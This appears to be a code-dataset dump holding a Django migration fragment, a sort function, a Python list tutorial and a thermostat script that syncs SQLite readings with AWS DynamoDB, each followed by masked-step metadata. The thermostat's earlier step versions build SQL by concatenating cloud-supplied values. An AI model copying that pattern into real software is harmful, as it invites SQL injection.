models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('login', '0006_usermovies_img'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='moviesinfo',\n name='country',\n field=models.CharField(default=1, max_length=50),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='moviesinfo',\n name='description',\n field=models.CharField(default=1, max_length=200),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='moviesinfo',\n name='director',\n field=models.CharField(default=1, max_length=100),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='moviesinfo',\n name='grenre',\n field=models.CharField(default=1, max_length=50),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='moviesinfo',\n name='year',\n field=models.CharField(default=1, max_length=8),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='usermovies',\n name='country',\n field=models.CharField(default=1, max_length=50),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='usermovies',\n name='description',\n field=models.CharField(default=1, max_length=200),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='usermovies',\n name='director',\n field=models.CharField(default=1, max_length=100),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='usermovies',\n name='grenre',\n field=models.CharField(default=1, max_length=50),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='usermovies',\n name='year',\n field=models.CharField(default=1, max_length=8),\n preserve_default=False,\n ),\n ]\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
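A hypothetical reconstruction of what the MoviesInfo model would look like after this migration runs — models.py is not shown, so field order and any fields added by earlier migrations (e.g. 0006_usermovies_img) are assumptions:

from django.db import models

class MoviesInfo(models.Model):
    country = models.CharField(max_length=50)
    description = models.CharField(max_length=200)
    director = models.CharField(max_length=100)
    grenre = models.CharField(max_length=50)  # spelled as in the migration
    year = models.CharField(max_length=8)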
def sort_descending(numbers):
    """Sort the given list of numbers in place, from largest to smallest."""
    numbers.sort(reverse=True)
normal
{ "blob_id": "46dc9917d9b3a7caf8d7ba5024b17d3b755fc5db", "index": 7278, "step-1": "<mask token>\n", "step-2": "def sort_descending(numbers):\n numbers.sort(reverse=True)\n", "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0, 1 ] }
[ 0, 1 ]
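Usage note: the function sorts in place and returns None; sorted() is the non-mutating alternative. A minimal demonstration:

def sort_descending(numbers):
    numbers.sort(reverse=True)

nums = [3, 1, 2]
sort_descending(nums)
print(nums)                             # [3, 2, 1] - the list itself was mutated
print(sorted([3, 1, 2], reverse=True))  # [3, 2, 1] - original left untouched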
# Lists are sequences of objects
# Mutable
# Lists are written within square brackets and items are separated by commas

#-----------------------------------Lists-----------------------------------#
# Lists of numbers
print("\n1. Lists of Numbers")
print("\t" + str([1,2,3]))

# Lists of strings
print("\n2. Lists of Strings")
print("\t" + str(["Lemon","Mango","Papaya"]))

list_fruits = ["Lemon","Mango","Papaya"]
print("\tMy favorite fruit is " + list_fruits[1])

print("\n3. List operations")
# Replace items within a list
list_fruits[2] = "Water Melons"
print("\tNew List: " + str(list_fruits))

# Create an empty list
list_Organizations = []
print("\n4. Create empty list")
print("\tList of Organizations: " + str(list_Organizations))

# Add values to a list
print("\n5. Add values to list")
list_Organizations.append("Microsoft")
list_Organizations.append("Amazon")
list_Organizations.append("Google")
print("\tAppend List of Organizations: " + str(list_Organizations))

# List of characters within a string
print("\tList of characters in string: " + str(list("Sandeep Dhamale")))

# Retrieve list items using a for loop
print("\n6. Retrieve List using for loop")
for organization in list_Organizations:
    print("\t" + organization)

# Get specific elements within a list: slicing
print("\n7. Get specific elements within list: Slicing")
list_numbers = [1,2,3,4,5]
sub_list_numbers = list_numbers[1:3]
print("\tSub list: " + str(sub_list_numbers))
print("\tLast element in list: " + str(list_numbers[-1]))
print("\tAll elements in list except first and last: " + str(list_numbers[1:-1]))
print("\tElements from index 2 in list: " + str(list_numbers[2:]))
print("\tElements till index 4 in list: " + str(list_numbers[:4]))

# Copying lists to another list - shallow copy
print("\n8. Copying Lists to other list")
list_numbers_direct = list_numbers
print("\tUsing assignment. Is list_numbers_direct is list_numbers: " + str(list_numbers_direct is list_numbers))

list_numbers_list_values = list_numbers[:]
print("\tUsing a full slice. Is list_numbers_list_values is list_numbers: " + str(list_numbers_list_values is list_numbers))

list_numbers_copy = list_numbers.copy()
print("\tUsing copy(). Is list_numbers_copy is list_numbers: " + str(list_numbers_copy is list_numbers))

list_numbers_list = list(list_numbers)
print("\tUsing list(). Is list_numbers_list is list_numbers: " + str(list_numbers_list is list_numbers))

print("\n9. Note: Although the copies are distinct list objects, the objects inside them are the same")
list_of_list = [[1,2],[3,4]]
copy_list_of_list = list_of_list[:]
print("\tcopy_list_of_list is list_of_list: " + str(copy_list_of_list is list_of_list))
print("\tcopy_list_of_list[element] is list_of_list[element]: " + str(copy_list_of_list[0] is list_of_list[0]))
print("\tIf an inner list is modified, e.g. by append, both copies see the change")
list_of_list[0].append('a')
print("\tlist_of_list: " + str(list_of_list))
print("\tcopy_list_of_list: " + str(copy_list_of_list))
print("\tcopy_list_of_list[element] is list_of_list[element]: " + str(copy_list_of_list[0] is list_of_list[0]))

print("\n10. Search in a list: list.index() - Returns the index of the first matched element")
temp_string = "Python is easy scripting language. It is easy to learn and build apps using Python."
temp_string_list = temp_string.split(" ")
print("\tString: " + temp_string)
print("\tString list: " + str(temp_string_list))
print("\tSearch a sub string in string list using list.index(): " + str(temp_string_list.index("scripting")))

print("\n11. Count occurrences of a substring in list")
print("\tCount occurrences of substring 'easy': " + str(temp_string_list.count("easy")))

print("\n12. Remove substring from string list")
del temp_string_list[3]
print("\tA. Remove substring from list using del (by index): " + str(temp_string_list))
print("\tOriginal string is unaffected: " + str(temp_string))

temp_string_list.remove("learn")
print("\tB. Remove substring from list using remove (by value): " + str(temp_string_list))
print("\tOriginal string is unaffected: " + str(temp_string))

print("\n13. Insert a substring into a string list. list.insert()")
temp_string_list.insert(3, "scripting")
print("\tInsert substring into list (at index): " + str(temp_string_list))
print("\tOriginal string is unaffected: " + str(temp_string))

print("\n14. Concatenating lists.")
temp_list_1 = [1,2,3]
temp_list_2 = [4,5,6]
temp_list = temp_list_1 + temp_list_2
print("\ta. temp_list = temp_list_1 + temp_list_2 = " + str(temp_list))
temp_list += temp_list
print("\tb. temp_list += temp_list " + str(temp_list))
temp_list.extend([7,8,9])
print("\tc. temp_list.extend() " + str(temp_list))

print("\n15. Reversing lists.")
temp_list.reverse()
print("\tReverse temp list: " + str(temp_list))

print("\n16. Sorting lists.")
temp_list = [5,55,555]
temp_list.sort()
print("\tSorted list: " + str(temp_list))
temp_list.sort(reverse=True)
print("\tSorted list (descending): " + str(temp_list))
print("\tSorting lists by a callable (built-in) function, e.g. len, using 'key'")
temp_string = "I am a software tester."
temp_string_list = temp_string.split()
print("\tString list: " + str(temp_string_list))
temp_string_list.sort(key=len)
print("\tSort by length of each word: " + str(temp_string_list))

print("\n17. Using sorted() (returns a sorted copy) instead of sort(), and reversed(), to avoid modifying the original list.")
x = [4, 9, 2, 1]
y = x
y.sort()
print("\t y = " + str(y))
print("\t x = " + str(x))

x = [4, 9, 2, 1]
print("\t y = " + str(sorted(x)))
print("\t x = " + str(x))
print("\t z = " + str(list(reversed(x))))
print("\t x = " + str(x))
normal
{ "blob_id": "4d35bb83378805daf4392a1752386ab1403404e0", "index": 1530, "step-1": "<mask token>\n", "step-2": "print(\"\"\"\n1. Lists of Numbers\"\"\")\nprint('\\t' + str([1, 2, 3]))\nprint(\"\"\"\n2. Lists of Strings\"\"\")\nprint('\\t' + str(['Lemon', 'Mango', 'Papaya']))\n<mask token>\nprint('\\tMy favorite fruit is ' + list_fruits[1])\nprint(\"\"\"\n3. List operations\"\"\")\n<mask token>\nprint('\\tNew List: ' + str(list_fruits))\n<mask token>\nprint(\"\"\"\n5. Create empty list\"\"\")\nprint('\\tList of Organizations: ' + str(list_Organizations))\nprint(\"\"\"\n5. Add values to list\"\"\")\nlist_Organizations.append('Microsoft')\nlist_Organizations.append('Amazon')\nlist_Organizations.append('Google')\nprint('\\tAppend List of Organizations: ' + str(list_Organizations))\nprint('\\tList of characters in string:' + str(list('Sandeep Dhamale')))\nprint(\"\"\"\n6. Retrieve List using for loop\"\"\")\nfor organization in list_Organizations:\n print('\\t' + organization)\nprint(\"\"\"\n7. Get specific elements within list: Slicing\"\"\")\n<mask token>\nprint('\\tSub list: ' + str(sub_list_numbers))\nprint('\\tLast element in list: ' + str(list_numbers[-1]))\nprint('\\tGet all elements in list except first and lasr: ' + str(\n list_numbers[1:-1]))\nprint('\\tElements from index 2 in list: ' + str(list_numbers[2:]))\nprint('\\tElements till index 4 in list: ' + str(list_numbers[:4]))\nprint(\"\"\"\n8. Copying Lists to other list\"\"\")\n<mask token>\nprint('\\tUsing assignment. Is list_numbers_direct is list_numbers ' + str(\n list_numbers_direct is list_numbers))\n<mask token>\nprint('\\tUsing assignment. Is list_numbers_list_values is list_numbers ' +\n str(list_numbers_list_values is list_numbers))\n<mask token>\nprint('\\tUsing assignment. Is list_numbers_copy is list_numbers ' + str(\n list_numbers_copy is list_numbers))\n<mask token>\nprint('\\tUsing assignment. Is list_numbers_list is list_numbers ' + str(\n list_numbers_list is list_numbers))\nprint(\n \"\"\"\n9. Note: Although the copies are not equal the objects inside the lists are equal\"\"\"\n )\n<mask token>\nprint('\\tcopy_list_of_list is list_of_list: ' + str(copy_list_of_list is\n list_of_list))\nprint('\\tcopy_list_of_list[element] is list_of_list[element]: ' + str(\n copy_list_of_list[0] is list_of_list[0]))\nprint('\\tEven if the values are modified e.g. append the list will be same')\nlist_of_list[0].append('a')\nprint('\\tlist_of_list: ' + str(list_of_list))\nprint('\\tcopy_list_of_list: ' + str(copy_list_of_list))\nprint('\\tcopy_list_of_list[element] is list_of_list[element]: ' + str(\n copy_list_of_list[0] is list_of_list[0]))\nprint(\n \"\"\"\n10.Search in a list: list.index() - Returns the first matched element\"\"\"\n )\n<mask token>\nprint('\\tString: ' + temp_string)\nprint('\\tString list: ' + str(temp_string_list))\nprint('\\tSearch a sub string in string list using list.index(): ' + str(\n temp_string_list.index('scripting')))\nprint(\"\"\"\n11.Count occurrence of substring in list\"\"\")\nprint('\\tCount occurrence of substring Python: ' + str(temp_string_list.\n count('easy')))\nprint(\"\"\"\n12.Remove substring from string list\"\"\")\ndel temp_string_list[3]\nprint('\\tA. Remove substring from list using del (by index): ' + str(\n temp_string_list))\nprint('\\tOriginal string is unaffected: ' + str(temp_string))\ntemp_string_list.remove('learn')\nprint('\\tB. 
Remove substring from list using remove (by value): ' + str(\n temp_string_list))\nprint('\\tOriginal string is unaffected: ' + str(temp_string))\nprint(\"\"\"\n12.Insert a substring in string. list.insert()\"\"\")\ntemp_string_list.insert(3, 'scripting')\nprint('\\tA. Insert substring to list (at index): ' + str(temp_string_list))\nprint('\\tOriginal string is unaffected: ' + str(temp_string))\nprint(\"\"\"\n13.Concatenating lists.\"\"\")\n<mask token>\nprint('\\ta. temp_list = temp_list_1 + temp_list_2 = ' + str(temp_list))\ntemp_list += temp_list\nprint('\\tb. temp_list += temp_list ' + str(temp_list))\ntemp_list.extend([7, 8, 9])\nprint('\\tc. temp_list.extend() ' + str(temp_list))\nprint(\"\"\"\n14. Reversing lists.\"\"\")\ntemp_list.reverse()\nprint('Reverse temp list: ' + str(temp_list))\nprint(\"\"\"\n15. Sorting lists.\"\"\")\n<mask token>\ntemp_list.sort()\nprint('\\tSorted list: ' + str(temp_list))\ntemp_list.sort(reverse=True)\nprint('\\tSorted list: ' + str(temp_list))\nprint(\"\\tSorting lists by callable functions (inbuilt) e.g. len using 'key\")\n<mask token>\nprint('\\tString list: ' + str(temp_string_list))\ntemp_string_list.sort(key=len)\nprint('\\tSort by length of each word: ' + str(temp_string_list))\n<mask token>\nprint(\n \"\"\"\n16. Using Sorted (copy of sort) instead of sort. and reversed to avoid modifications in original list.\"\"\"\n )\n<mask token>\ny.sort()\nprint('\\t y= ' + str(y))\nprint('\\t x= ' + str(x))\n<mask token>\nprint('\\t y= ' + str(sorted(x)))\nprint('\\t x= ' + str(x))\nprint('\\t z= ' + str(list(reversed(x))))\nprint('\\t x= ' + str(x))\n", "step-3": "print(\"\"\"\n1. Lists of Numbers\"\"\")\nprint('\\t' + str([1, 2, 3]))\nprint(\"\"\"\n2. Lists of Strings\"\"\")\nprint('\\t' + str(['Lemon', 'Mango', 'Papaya']))\nlist_fruits = ['Lemon', 'Mango', 'Papaya']\nprint('\\tMy favorite fruit is ' + list_fruits[1])\nprint(\"\"\"\n3. List operations\"\"\")\nlist_fruits[2] = 'Water Melons'\nprint('\\tNew List: ' + str(list_fruits))\nlist_Organizations = []\nprint(\"\"\"\n5. Create empty list\"\"\")\nprint('\\tList of Organizations: ' + str(list_Organizations))\nprint(\"\"\"\n5. Add values to list\"\"\")\nlist_Organizations.append('Microsoft')\nlist_Organizations.append('Amazon')\nlist_Organizations.append('Google')\nprint('\\tAppend List of Organizations: ' + str(list_Organizations))\nprint('\\tList of characters in string:' + str(list('Sandeep Dhamale')))\nprint(\"\"\"\n6. Retrieve List using for loop\"\"\")\nfor organization in list_Organizations:\n print('\\t' + organization)\nprint(\"\"\"\n7. Get specific elements within list: Slicing\"\"\")\nlist_numbers = [1, 2, 3, 4, 5]\nsub_list_numbers = list_numbers[1:3]\nprint('\\tSub list: ' + str(sub_list_numbers))\nprint('\\tLast element in list: ' + str(list_numbers[-1]))\nprint('\\tGet all elements in list except first and lasr: ' + str(\n list_numbers[1:-1]))\nprint('\\tElements from index 2 in list: ' + str(list_numbers[2:]))\nprint('\\tElements till index 4 in list: ' + str(list_numbers[:4]))\nprint(\"\"\"\n8. Copying Lists to other list\"\"\")\nlist_numbers_direct = list_numbers\nprint('\\tUsing assignment. Is list_numbers_direct is list_numbers ' + str(\n list_numbers_direct is list_numbers))\nlist_numbers_list_values = list_numbers[:]\nprint('\\tUsing assignment. Is list_numbers_list_values is list_numbers ' +\n str(list_numbers_list_values is list_numbers))\nlist_numbers_copy = list_numbers.copy()\nprint('\\tUsing assignment. 
Is list_numbers_copy is list_numbers ' + str(\n list_numbers_copy is list_numbers))\nlist_numbers_list = list(list_numbers)\nprint('\\tUsing assignment. Is list_numbers_list is list_numbers ' + str(\n list_numbers_list is list_numbers))\nprint(\n \"\"\"\n9. Note: Although the copies are not equal the objects inside the lists are equal\"\"\"\n )\nlist_of_list = [[1, 2], [3, 4]]\ncopy_list_of_list = list_of_list[:]\nprint('\\tcopy_list_of_list is list_of_list: ' + str(copy_list_of_list is\n list_of_list))\nprint('\\tcopy_list_of_list[element] is list_of_list[element]: ' + str(\n copy_list_of_list[0] is list_of_list[0]))\nprint('\\tEven if the values are modified e.g. append the list will be same')\nlist_of_list[0].append('a')\nprint('\\tlist_of_list: ' + str(list_of_list))\nprint('\\tcopy_list_of_list: ' + str(copy_list_of_list))\nprint('\\tcopy_list_of_list[element] is list_of_list[element]: ' + str(\n copy_list_of_list[0] is list_of_list[0]))\nprint(\n \"\"\"\n10.Search in a list: list.index() - Returns the first matched element\"\"\"\n )\ntemp_string = (\n 'Python is easy scripting language. It is easy to learn and build apps using Python.'\n )\ntemp_string_list = temp_string.split(' ')\nprint('\\tString: ' + temp_string)\nprint('\\tString list: ' + str(temp_string_list))\nprint('\\tSearch a sub string in string list using list.index(): ' + str(\n temp_string_list.index('scripting')))\nprint(\"\"\"\n11.Count occurrence of substring in list\"\"\")\nprint('\\tCount occurrence of substring Python: ' + str(temp_string_list.\n count('easy')))\nprint(\"\"\"\n12.Remove substring from string list\"\"\")\ndel temp_string_list[3]\nprint('\\tA. Remove substring from list using del (by index): ' + str(\n temp_string_list))\nprint('\\tOriginal string is unaffected: ' + str(temp_string))\ntemp_string_list.remove('learn')\nprint('\\tB. Remove substring from list using remove (by value): ' + str(\n temp_string_list))\nprint('\\tOriginal string is unaffected: ' + str(temp_string))\nprint(\"\"\"\n12.Insert a substring in string. list.insert()\"\"\")\ntemp_string_list.insert(3, 'scripting')\nprint('\\tA. Insert substring to list (at index): ' + str(temp_string_list))\nprint('\\tOriginal string is unaffected: ' + str(temp_string))\nprint(\"\"\"\n13.Concatenating lists.\"\"\")\ntemp_list_1 = [1, 2, 3]\ntemp_list_2 = [4, 5, 6]\ntemp_list = temp_list_1 + temp_list_2\nprint('\\ta. temp_list = temp_list_1 + temp_list_2 = ' + str(temp_list))\ntemp_list += temp_list\nprint('\\tb. temp_list += temp_list ' + str(temp_list))\ntemp_list.extend([7, 8, 9])\nprint('\\tc. temp_list.extend() ' + str(temp_list))\nprint(\"\"\"\n14. Reversing lists.\"\"\")\ntemp_list.reverse()\nprint('Reverse temp list: ' + str(temp_list))\nprint(\"\"\"\n15. Sorting lists.\"\"\")\ntemp_list = [5, 55, 555]\ntemp_list.sort()\nprint('\\tSorted list: ' + str(temp_list))\ntemp_list.sort(reverse=True)\nprint('\\tSorted list: ' + str(temp_list))\nprint(\"\\tSorting lists by callable functions (inbuilt) e.g. len using 'key\")\ntemp_string = 'I am a software tester.'\ntemp_string_list = temp_string.split()\nprint('\\tString list: ' + str(temp_string_list))\ntemp_string_list.sort(key=len)\nprint('\\tSort by length of each word: ' + str(temp_string_list))\ntemp_number_list = [3, 45, 12, 1, 99, 44]\nprint(\n \"\"\"\n16. Using Sorted (copy of sort) instead of sort. 
and reversed to avoid modifications in original list.\"\"\"\n )\nx = [4, 9, 2, 1]\ny = x\ny.sort()\nprint('\\t y= ' + str(y))\nprint('\\t x= ' + str(x))\nx = [4, 9, 2, 1]\nprint('\\t y= ' + str(sorted(x)))\nprint('\\t x= ' + str(x))\nprint('\\t z= ' + str(list(reversed(x))))\nprint('\\t x= ' + str(x))\n", "step-4": "# Lists are sequence of objects\n# Mutable\n# Lists are represented within square brackets and items are seperated by commas\n\n#-----------------------------------Lists-----------------------------------#\n# Lists of Numbers\nprint(\"\\n1. Lists of Numbers\")\nprint(\"\\t\" + str([1,2,3]))\n\n# Lists of Strings\nprint(\"\\n2. Lists of Strings\")\nprint(\"\\t\" + str([\"Lemon\",\"Mango\",\"Papaya\"]))\n\nlist_fruits =[\"Lemon\",\"Mango\",\"Papaya\"]\nprint(\"\\tMy favorite fruit is \" + list_fruits[1])\n\nprint(\"\\n3. List operations\")\n#Replace items within list\nlist_fruits[2]=\"Water Melons\"\nprint(\"\\tNew List: \" + str(list_fruits))\n\n#Create Empty List\nlist_Organizations = []\nprint(\"\\n5. Create empty list\")\nprint(\"\\tList of Organizations: \" + str(list_Organizations))\n\n#Add values to list\nprint(\"\\n5. Add values to list\")\nlist_Organizations.append(\"Microsoft\")\nlist_Organizations.append(\"Amazon\")\nlist_Organizations.append(\"Google\")\nprint(\"\\tAppend List of Organizations: \" + str(list_Organizations))\n\n#List of characters within string\nprint(\"\\tList of characters in string:\" + str(list(\"Sandeep Dhamale\")))\n\n# Retrieve List using for loop\nprint(\"\\n6. Retrieve List using for loop\")\nfor organization in list_Organizations:\n print(\"\\t\" + organization)\n\n# Get specific elements within list: Slicing\nprint(\"\\n7. Get specific elements within list: Slicing\")\nlist_numbers = [1,2,3,4,5]\nsub_list_numbers = list_numbers[1:3]\nprint(\"\\tSub list: \" + str(sub_list_numbers))\nprint(\"\\tLast element in list: \" + str(list_numbers[-1]))\nprint(\"\\tGet all elements in list except first and lasr: \" + str(list_numbers[1:-1]))\nprint(\"\\tElements from index 2 in list: \" + str(list_numbers[2:]))\nprint(\"\\tElements till index 4 in list: \" + str(list_numbers[:4]))\n\n#Copying Lists to other list - Shallow copy\nprint(\"\\n8. Copying Lists to other list\")\nlist_numbers_direct = list_numbers\nprint(\"\\tUsing assignment. Is list_numbers_direct is list_numbers \" + str(list_numbers_direct is list_numbers))\n\nlist_numbers_list_values = list_numbers[:]\nprint(\"\\tUsing assignment. Is list_numbers_list_values is list_numbers \" + str(list_numbers_list_values is list_numbers))\n\nlist_numbers_copy = list_numbers.copy()\nprint(\"\\tUsing assignment. Is list_numbers_copy is list_numbers \" + str(list_numbers_copy is list_numbers))\n\nlist_numbers_list = list(list_numbers)\nprint(\"\\tUsing assignment. Is list_numbers_list is list_numbers \" + str(list_numbers_list is list_numbers))\n\nprint(\"\\n9. Note: Although the copies are not equal the objects inside the lists are equal\")\nlist_of_list = [[1,2],[3,4]]\ncopy_list_of_list = list_of_list[:]\nprint(\"\\tcopy_list_of_list is list_of_list: \" + str(copy_list_of_list is list_of_list))\nprint(\"\\tcopy_list_of_list[element] is list_of_list[element]: \" + str(copy_list_of_list[0] is list_of_list[0]))\nprint(\"\\tEven if the values are modified e.g. 
via append, both lists reflect it\")\nlist_of_list[0].append('a')\nprint(\"\\tlist_of_list: \" + str(list_of_list))\nprint(\"\\tcopy_list_of_list: \" + str(copy_list_of_list))\nprint(\"\\tcopy_list_of_list[element] is list_of_list[element]: \" + str(copy_list_of_list[0] is list_of_list[0]))\n\nprint(\"\\n10.Search in a list: list.index() - Returns the index of the first matched element\")\ntemp_string = \"Python is easy scripting language. It is easy to learn and build apps using Python.\"\ntemp_string_list = temp_string.split(\" \")\nprint(\"\\tString: \" + temp_string)\nprint(\"\\tString list: \" + str(temp_string_list))\nprint(\"\\tSearch a sub string in string list using list.index(): \" + str(temp_string_list.index(\"scripting\")))\n\nprint(\"\\n11.Count occurrence of substring in list\")\nprint(\"\\tCount occurrence of substring easy: \" + str(temp_string_list.count(\"easy\")))\n\nprint(\"\\n12.Remove substring from string list\")\ndel temp_string_list[3]\nprint(\"\\tA. Remove substring from list using del (by index): \" + str(temp_string_list))\nprint(\"\\tOriginal string is unaffected: \" + str(temp_string))\n\ntemp_string_list.remove(\"learn\")\nprint(\"\\tB. Remove substring from list using remove (by value): \" + str(temp_string_list))\nprint(\"\\tOriginal string is unaffected: \" + str(temp_string))\n\nprint(\"\\n13.Insert a substring in string list. list.insert()\")\ntemp_string_list.insert(3, \"scripting\")\nprint(\"\\tA. Insert substring to list (at index): \" + str(temp_string_list))\nprint(\"\\tOriginal string is unaffected: \" + str(temp_string))\n\nprint(\"\\n14.Concatenating lists.\")\ntemp_list_1=[1,2,3]\ntemp_list_2 = [4,5,6]\ntemp_list = temp_list_1 + temp_list_2\nprint(\"\\ta. temp_list = temp_list_1 + temp_list_2 = \" + str(temp_list))\ntemp_list+=temp_list\nprint(\"\\tb. temp_list += temp_list \" + str(temp_list))\ntemp_list.extend([7,8,9])\nprint(\"\\tc. temp_list.extend() \" + str(temp_list))\n\nprint(\"\\n15. Reversing lists.\")\ntemp_list.reverse()\nprint(\"\\tReverse temp list: \" + str(temp_list))\n\nprint(\"\\n16. Sorting lists.\")\ntemp_list = [5,55,555]\ntemp_list.sort()\nprint(\"\\tSorted list: \" + str(temp_list))\ntemp_list.sort(reverse=True)\nprint(\"\\tSorted list: \" + str(temp_list))\nprint(\"\\tSorting lists by callable functions (inbuilt) e.g. len using 'key'\")\ntemp_string = \"I am a software tester.\"\ntemp_string_list = temp_string.split()\nprint(\"\\tString list: \" + str(temp_string_list))\ntemp_string_list.sort(key=len)\nprint(\"\\tSort by length of each word: \" + str(temp_string_list))\ntemp_number_list=[3,45,12,1,99,44]\n\nprint(\"\\n17. Using sorted() (which returns a sorted copy) instead of sort(), and reversed() to avoid modifying the original list.\")\nx=[4, 9, 2, 1]\ny = x\ny.sort()\nprint(\"\\t y= \" + str(y))\nprint(\"\\t x= \" + str(x))\n\nx=[4, 9, 2, 1]\nprint(\"\\t y= \" + str(sorted(x)))\nprint(\"\\t x= \" + str(x))\nprint(\"\\t z= \" + str(list(reversed(x))))\nprint(\"\\t x= \" + str(x))\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
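A note on the shallow-copy behavior the example above demonstrates: slicing, copy(), and list() all copy only the outer list, so nested lists remain shared between the original and the copy. A minimal sketch of the standard-library alternative, copy.deepcopy(), which recursively copies nested objects (variable names here are illustrative, not from the example):

import copy

list_of_list = [[1, 2], [3, 4]]
deep_copy_of_list = copy.deepcopy(list_of_list)
# The nested lists are now independent objects
print(deep_copy_of_list[0] is list_of_list[0])  # False
list_of_list[0].append('a')
print(list_of_list)        # [[1, 2, 'a'], [3, 4]]
print(deep_copy_of_list)   # [[1, 2], [3, 4]] - unaffected by the append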
import boto3
import time
import datetime
from datetime import date
import sqlite3
import logging
import logging.handlers
from decimal import Decimal

### LOGS CONFIGURATION ###
LOG_FILENAME = '/home/pi/Thermostat/alexaThermostat/logs/alexaThermostat.out'

# Set up a specific logger with our desired output level
my_logger = logging.getLogger('MyLogger')
my_logger.setLevel(logging.DEBUG)

# Add the log message handler to the logger
handler = logging.handlers.RotatingFileHandler(
    LOG_FILENAME, maxBytes=25000, backupCount=10)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
my_logger.addHandler(handler)

### SQLITE3 CONNECTION ###
conn = sqlite3.connect('/home/pi/Thermostat/backThermostat/thermostat.db')
# Allow access to row columns by name
conn.row_factory = sqlite3.Row
c = conn.cursor()

### CONNECT TO DYNAMODB IN AWS
client = boto3.resource('dynamodb')
table_thermostat_status = client.Table("thermostat_status")
table_thermostat_alexa_order = client.Table("thermostat_alexa_order")

while 1:
    ### READ DESIRED AND REAL TEMPERATURE
    c.execute("SELECT * FROM TEMP_HIST WHERE ID=(SELECT MAX(ID) FROM TEMP_HIST);")
    row = c.fetchone()
    my_logger.debug("Current temp: " + str(row["temp"]) + " desired temp: " + str(row["tem_des"]) + " boiler status: " + str(row["heating"]))
    read_date = row["day"]
    real_temp = row["temp"]
    desire_temp = row["tem_des"]
    heating_status = row["heating"]

    # Convert through str() so DynamoDB receives a compact Decimal, not a raw float
    table_thermostat_status.put_item(TableName='thermostat_status', Item={'id': 1, 'desire_temp': Decimal(str(desire_temp)), 'real_temp': Decimal(str(real_temp)), 'status': heating_status, 'status_date': str(datetime.datetime.now())})

    ### SEARCH FOR ANY ALEXA ORDER IN AWS DYNAMODB ###
    alexa_order = table_thermostat_alexa_order.get_item(TableName='thermostat_alexa_order', Key={'id': 1})

    if 'Item' in alexa_order:
        my_logger.debug("Alexa order received with temperature = " + str(alexa_order['Item']['desire_temp']))
        # Bind the value as a parameter instead of concatenating it into the SQL string
        c.execute("UPDATE MANUAL_PROGRAM SET ACTIVE=1, TEMP=?", (float(alexa_order['Item']['desire_temp']),))
        conn.commit()
        table_thermostat_alexa_order.delete_item(TableName='thermostat_alexa_order', Key={'id': 1})
        my_logger.debug("Alexa order deleted")
    else:
        my_logger.debug("No Alexa order pending")

    ### DELAY 5 SECONDS
    time.sleep(5)
normal
{ "blob_id": "fcc75550e1317a15c36bc8100c28af59b68e1381", "index": 1571, "step-1": "<mask token>\n", "step-2": "<mask token>\nmy_logger.setLevel(logging.DEBUG)\n<mask token>\nhandler.setFormatter(formatter)\nmy_logger.addHandler(handler)\n<mask token>\nwhile 1:\n c.execute(\n 'SELECT * FROM TEMP_HIST WHERE ID=(SELECT MAX(ID) FROM TEMP_HIST);')\n row = c.fetchone()\n my_logger.debug('Temp actual: ' + str(row['temp']) + ' temp des: ' +\n str(row['tem_des']) + ' Estado Caldera: ' + str(row['heating']))\n read_date = row['day']\n real_temp = row['temp']\n desire_temp = row['tem_des']\n heating_status = row['heating']\n table_thermostat_status.put_item(TableName='thermostat_status', Item={\n 'id': 1, 'desire_temp': Decimal(desire_temp), 'real_temp': Decimal(\n real_temp), 'status': heating_status, 'status_date': str(datetime.\n datetime.now())})\n alexa_order = table_thermostat_alexa_order.get_item(TableName=\n 'thermostat_alexa_order', Key={'id': 1})\n if 'Item' in alexa_order:\n my_logger.debug('Hay orden de Alexa con temperatura = ' + str(\n alexa_order['Item']['desire_temp']))\n c.execute('UPDATE MANUAL_PROGRAM SET ACTIVE=1, TEMP=' + str(\n alexa_order['Item']['desire_temp']))\n conn.commit()\n table_thermostat_alexa_order.delete_item(TableName=\n 'thermostat_alexa_order', Key={'id': 1})\n my_logger.debug('Orden alexa eliminada')\n else:\n my_logger.debug('No hay orden de Alexa')\n time.sleep(5)\n", "step-3": "<mask token>\nLOG_FILENAME = '/home/pi/Thermostat/alexaThermostat/logs/alexaThermostat.out'\nmy_logger = logging.getLogger('MyLogger')\nmy_logger.setLevel(logging.DEBUG)\nhandler = logging.handlers.RotatingFileHandler(LOG_FILENAME, maxBytes=25000,\n backupCount=10)\nformatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler.setFormatter(formatter)\nmy_logger.addHandler(handler)\nconn = sqlite3.connect('/home/pi/Thermostat/backThermostat/thermostat.db')\nconn.row_factory = sqlite3.Row\nc = conn.cursor()\nclient = boto3.resource('dynamodb')\ntable_thermostat_status = client.Table('thermostat_status')\ntable_thermostat_alexa_order = client.Table('thermostat_alexa_order')\nwhile 1:\n c.execute(\n 'SELECT * FROM TEMP_HIST WHERE ID=(SELECT MAX(ID) FROM TEMP_HIST);')\n row = c.fetchone()\n my_logger.debug('Temp actual: ' + str(row['temp']) + ' temp des: ' +\n str(row['tem_des']) + ' Estado Caldera: ' + str(row['heating']))\n read_date = row['day']\n real_temp = row['temp']\n desire_temp = row['tem_des']\n heating_status = row['heating']\n table_thermostat_status.put_item(TableName='thermostat_status', Item={\n 'id': 1, 'desire_temp': Decimal(desire_temp), 'real_temp': Decimal(\n real_temp), 'status': heating_status, 'status_date': str(datetime.\n datetime.now())})\n alexa_order = table_thermostat_alexa_order.get_item(TableName=\n 'thermostat_alexa_order', Key={'id': 1})\n if 'Item' in alexa_order:\n my_logger.debug('Hay orden de Alexa con temperatura = ' + str(\n alexa_order['Item']['desire_temp']))\n c.execute('UPDATE MANUAL_PROGRAM SET ACTIVE=1, TEMP=' + str(\n 